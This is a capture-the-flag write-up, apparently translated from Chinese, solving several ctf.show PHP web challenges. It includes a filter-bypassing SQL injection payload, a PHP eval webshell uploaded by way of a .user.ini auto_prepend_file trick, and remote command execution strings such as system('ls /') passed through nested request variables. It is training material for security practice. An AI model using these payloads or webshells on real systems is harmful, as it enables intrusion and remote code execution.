[ctf.show-web contest questions]

---

ctf.show_web10

Come to the page is a login box

Click the cancel button, the source code appears

<?php
		$flag="";
        function replaceSpecialChar($strParam){
    
    
             $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i";
             return preg_replace($regex,"",$strParam);
        }
        if (!$con)
        {
    
    
            die('Could not connect: ' . mysqli_error());
        }
		if(strlen($username)!=strlen(replaceSpecialChar($username))){
    
    
			die("sql inject error");
		}
		if(strlen($password)!=strlen(replaceSpecialChar($password))){
    
    
			die("sql inject error");
		}
		$sql="select * from user where username = '$username'";
		$result=mysqli_query($con,$sql);
			if(mysqli_num_rows($result)>0){
    
    
					while($row=mysqli_fetch_assoc($result)){
    
    
						if($password==$row['password']){
    
    
							echo "登陆成功<br>";
							echo $flag;
						}

					 }
			}
    ?>

A lot of injection statements have been filtered.
Group by and with rollup are mainly used here to combine
group by, not to mention, it is an arrangement, and the default is ascending order
with rollup (group by can be followed by with rollup, which means that summary statistics are performed again on the basis of group statistics)
There will be an extra line in the result, where the password column is null, and count (*) is the statistical sum.
For example:

select password,count(*) from test group by password with rollup;

So we construct the payload:

username=admin'/**/or/**/1=1/**/group/**/by/**/password/**/with/**/rollup#&password=

Because after adding with rollup, the password has a row of NULL, we only need to enter an empty password to make (NULL==NULL), /**/ is used to bypass the space filter

You can get flag
ctfshow{d89ccf86-5ac9-4429-95e0-ea40b0afba89}

---

Two, ctf.show_web11

Come to the home page

You can see that the php code has many restrictions.
Notice the way to get the flag $password==$_SESSION['password']. The password is entered by ourselves. The password in the session is stored locally, so we only need to enter an empty password and delete the local session to successfully bypass it. .

Get flag:
ctfshow{5f4e07ee-e7d9-4302-8b7d-f3eabfa0ed16}

3. ctf.show_web12

Come to the home page

Check out the source code first

There is a prompt cmd variable, indicating that there is likely to be a function of code execution in the background.
Input phpinfo(); view php configuration information

It is found that many command execution methods are disabled.
You can also use highlight_file("index.php"); view the source code

Here is another php function glob();
the glob() function returns the file name or directory that matches the specified pattern.
for example:

glob("*") 匹配任意文件
glob("*.txt")匹配以txt为后缀的文件

With this method, we first find out all the files in the current directory to see if they are available. Input?cmd=print_r(glob(“*”)); print out the following file

and then read the file

?cmd=highlight_file('903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php');

Get flag:
ctfshow{2eb6ffd3-82c8-4718-a528-9b251e5a31e9}

4. ctf.show_web13

Come to the page

and try to upload the file, but there is no effect, find the hidden directory

Found upload.php, try upload.php.bak to get the source code file

<?php 
	header("content-type:text/html;charset=utf-8");
	$filename = $_FILES['file']['name'];
	$temp_name = $_FILES['file']['tmp_name'];
	$size = $_FILES['file']['size'];
	$error = $_FILES['file']['error'];
	$arr = pathinfo($filename);
	$ext_suffix = $arr['extension'];
	if ($size > 24){
    
    
		die("error file zise");
	}
	if (strlen($filename)>9){
    
    
		die("error file name");
	}
	if(strlen($ext_suffix)>3){
    
    
		die("error suffix");
	}
	if(preg_match("/php/i",$ext_suffix)){
    
    
		die("error suffix");
    }
    if(preg_match("/php/i"),$filename)){
    
    
        die("error file name");
    }
	if (move_uploaded_file($temp_name, './'.$filename)){
    
    
		echo "文件上传成功！";
	}else{
    
    
		echo "文件上传失败！";
	}

 ?>

Obtained the source code and found that the size of the restrictive file is <=24, the length of the name is <=9, the length of the suffix is ​​<=3, and the name and suffix cannot have php, so such a Trojan horse can be
constructed

<?php eval($_POST['a']);

Due to the suffix, upload 2.txt first

and then upload the .user.ini file.
The .user.ini in php has the following explanation:
PHP will search for the file name in each directory; if it is set to an empty string, PHP will not search, that is, if the file name is set in .user.ini , then any page will include the contents of the file.
We enter auto_prepend_file = 2.txt in .user.ini, so that all files in this directory will contain the content of 2.txt
//
After the ant sword is connected, we find that there is no permission to operate the file, so we directly enter the web page Look up the flag on.
Submit with POST

a=print_r(glob("*"));

Then use highlight_file() to get the flag

a=highlight_file("文件名");

5. Vegetable Dog Cup

1. Web sign-in

come to the page

the code

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-11-10 17:20:38
# @Last Modified by:   h1xa
# @Last Modified time: 2022-11-11 09:38:59
# @email: [email protected]
# @link: https://ctfer.com

*/


error_reporting(0);
highlight_file(__FILE__);

eval($_REQUEST[$_GET[$_POST[$_COOKIE['CTFshow-QQ群:']]]][6][0][7][5][8][0][9][4][4]);

I have been trying for a long time, is this really a sign-in question? After reading the big guy's wp, to sum up
the investigation is: the relationship between the request method and the assignment, as well as the Chinese encoding of the Cookie field.

The main reason is the use of the last one-sentence Trojan horse, which has a lot of nesting. Let’s take a look at it:
first, the innermost part is 'CTFshow-QQ group:', and the front is $_COOKIE, that is, the 'CTFshow-QQ group' in the cookie is taken. The value;
then if we pass it in the cookie CTFshow-QQ群:=a, the one-sentence Trojan horse becomes:

eval($_REQUEST[$_GET[$_POST[a]]][6][0][7][5][8][0][9][4][4]);

Then $_POST[a] is the value of the a parameter to be passed in by POST, we will pass it in a=b, then it becomes:

eval($_REQUEST[$_GET[b]][6][0][7][5][8][0][9][4][4]);

$_GET[b] is to pass in the value of the b parameter in GET mode, and then assign a value to b b=cto get:

eval($_REQUEST[c][6][0][7][5][8][0][9][4][4]);

$_REQUEST[c][6][0][7][5][8][0][9][4][4], which $_REQUESTcan be requested in any way, c is an array, and the value passed in the $_REQUEST request is [6][0][7][5][8][0][9][4][4]the value of the ID key in the C array. Because PHP arrays can assign values ​​to ID keys.
Then we can directly assign values ​​to these keys in the C array:
c[6][0][7][5][8][0][9][4][4]= system('ls /');

So we use the POST form to send the package, and pay attention “群”to use url encoding %E7%BE%A4, otherwise burp will not recognize it (when assigning a value to c, it can be placed in the request header or in the request entity, because the request request method can be in the form of get or post. accept)

Here I use hackbar conveniently,

so we get the flagaaa file, enter the command cat /f1agaaato get the flag

and gain a lot

2.web2 c0me_t0_s1gn

When I came to the page

, I was prompted that there was information to be found. I tried to use Yujian and dirsearch to find the directory, but I couldn’t find it. I saw the source code of the page later. I saw

some information about the flag, and followed the specific prompt to the console. It prompted

the operation method to find the flag, and

found it after running. The information in the second half of the flag can be spliced.

3. I only have $ in my eyes

come to the page

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-11-10 17:20:38
# @Last Modified by:   h1xa
# @Last Modified time: 2022-11-11 08:21:54
# @email: [email protected]
# @link: https://ctfer.com

*/


error_reporting(0);
extract($_POST);
eval($$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$_);
highlight_file(__FILE__);

You can see that the post method is used to pass in parameters. Here we are examining the nesting of variables, a series of $variables, the initial variable should be _, so we need to define the variables in turn, and assign them to the command execution statement after doing it, system('ls /');and the variables cannot be repeated

Not very good at writing scripts, refer to the big guy

_=a&a=b&b=c&c=d&d=e&e=f&f=g&g=h&h=i&i=j&j=k&k=l&l=m&m=n&n=o&o=p&p=q&q=r&r=s&s=t&t=u&u=v&v=w&w=x&x=y&y=z&z=A&A=B&B=C&C=D&D=E&E=F&F=G&G=H&H=I&I=system('ls /')

Modify the command to get the flag

---

Summarize

Follow-up will continue to share ctfshow notes